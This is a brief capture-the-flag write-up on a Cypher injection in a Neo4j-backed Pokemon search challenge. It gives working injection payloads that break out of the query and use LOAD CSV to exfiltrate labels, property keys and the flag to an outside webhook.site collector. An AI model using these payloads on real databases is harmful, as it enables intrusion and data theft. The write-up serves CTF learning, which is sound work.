Tags: web injection neo4j
Rating:
One comma causes an error = injection. But its not SQL, but from the returened error it seems to be neo4j db.
After some trial and error, came to conclusion that the query looks something like this:
`MATCH (pokemon:Pokemon) WHERE p.name =~ '.*' + toLower({param}) + '.*' RETURN p`
sending this:
`') RETURN pokemon//`
works perfectly
Abuse LOAD CSV to leak some information:
`') CALL db.labels() YIELD name as label LOAD CSV FROM 'https://webhook.site/REDACTED/'+label AS y RETURN *//`
reveals that there are two types of nodes in the graph: pokemon and flag.
now trying to read the properties of flag:
`') MATCH (f:flag) WITH KEYS(f) as keys UNWIND keys as key LOAD CSV FROM 'https://webhook.site/REDACTED/'+key AS y RETURN *//`
reveals a property flag:
`') MATCH (f:flag) WITH f.flag as ff LOAD CSV FROM 'https://webhook.site/REDACTED/'+ff AS y RETURN *//`